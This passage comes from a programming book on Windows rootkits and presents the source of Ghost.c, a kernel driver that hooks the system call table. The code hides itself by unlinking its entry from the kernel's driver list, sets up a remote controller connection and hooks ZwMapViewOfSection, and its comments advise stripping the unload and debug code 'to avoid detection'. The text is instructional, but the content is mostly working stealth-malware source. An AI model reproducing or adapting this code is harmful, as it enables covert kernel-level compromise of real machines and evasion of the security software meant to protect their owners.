Professional Rootkits (Programmer to Programmer)
The functionality required to hook the kernel system call table has been implemented by creating two new files and modifying two existing files. Remember that every file presented in this and the following chapters can be downloaded from the Wrox/Wiley Professional Rootkits website.
The new files are as follows:
hookManager.c hookManager.h
Following are the modified files:
Ghost.c SOURCES
The code is shown in the following section.
SOURCES
The file hookManager.c has been added to SOURCES:
TARGETNAME=comint32 TARGETPATH=OBJ TARGETTYPE=DRIVER SOURCES=Ghost.c\ fileManager.c\ hookManager.c\ configManager.c
Ghost.c
Three new global variables have been added to Ghost.c: NewSystemCallTable, pMyMDL, and OldZwMapViewOfSection. Once again, NewSystemCallTable and pMyMDL are used to circumvent the possibility of memory protection, and OldZwMapViewOfSection holds the address of the original ZwMapViewOfSection. It should be noted that the original ZwMapViewOfSection might not be the original address placed in the system call table during system boot. This address may be from another rootkit or security software.
The DriverUnload function has been modified to unhook ZwMapViewOfSection and return the MDL. Again, DriverUnload might not be required in a production environment, but it can be very useful in a development environment.
The only other addition to Ghost.c is the call to Hook. Hook is declared in hookManager.h and implemented in hookManager.c. For simplicity, the more complicated header file will be listed after the implementation file:
// Ghost // Copyright Ric Vieler, 2006 #include "ntddk.h" #include "Ghost.h" #include "fileManager.h" #include "configManager.h" #include "hookManager.h" // Used to circumvent memory protected System Call Table PVOID* NewSystemCallTable = NULL; PMDL pMyMDL = NULL; // Pointer(s) to original function(s) ZWMAPVIEWOFSECTION OldZwMapViewOfSection; // Global version data ULONG majorVersion; ULONG minorVersion; // Comment out in free build to avoid detection VOID OnUnload( IN PDRIVER_OBJECT pDriverObject ) { DbgPrint("comint32: OnUnload called."); // Unhook any hooked functions and return the Memory Descriptor List if( NewSystemCallTable ) { UNHOOK( ZwMapViewOfSection, OldZwMapViewOfSection ); MmUnmapLockedPages( NewSystemCallTable, pMyMDL ); IoFreeMdl( pMyMDL ); } } NTSTATUS DriverEntry( IN PDRIVER_OBJECT pDriverObject, IN PUNICODE_STRING theRegistryPath ) { DRIVER_DATA* driverData; // Get the operating system version PsGetVersion( &majorVersion, &minorVersion, NULL, NULL ); // Major = 4: Windows NT 4.0, Windows Me, Windows 98 or Windows 95 // Major = 5: Windows Server 2003, Windows XP or Windows 2000 // Minor = 0: Windows 2000, Windows NT 4.0 or Windows 95 // Minor = 1: Windows XP // Minor = 2: Windows Server 2003 if ( majorVersion == 5 && minorVersion == 2 ) { DbgPrint("comint32: Running on Windows 2003"); } else if ( majorVersion == 5 && minorVersion == 1 ) { DbgPrint("comint32: Running on Windows XP"); } else if ( majorVersion == 5 && minorVersion == 0 ) { DbgPrint("comint32: Running on Windows 2000"); } else if ( majorVersion == 4 && minorVersion == 0 ) { DbgPrint("comint32: Running on Windows NT 4.0"); } else { DbgPrint("comint32: Running on unknown system"); } // Hide this driver driverData = *((DRIVER_DATA**)((DWORD)pDriverObject + 20)); if( driverData != NULL ) { // unlink this driver entry from the driver list *((PDWORD)driverData->listEntry.Blink) = (DWORD)driverData->listEntry.Flink; driverData->listEntry.Flink->Blink = driverData->listEntry.Blink; } // Comment out in free build to avoid detection theDriverObject->DriverUnload = OnUnload; // Configure the controller connection if( !NT_SUCCESS( Configure() ) ) { DbgPrint("comint32: Could not configure remote connection.\n"); return STATUS_UNSUCCESSFUL; } // Hook the System Call Table if( !NT_SUCCESS( Hook() ) ) { DbgPrint("comint32: Could not hook the System Call Table.\n"); return STATUS_UNSUCCESSFUL; } return STATUS_SUCCESS; }
Категории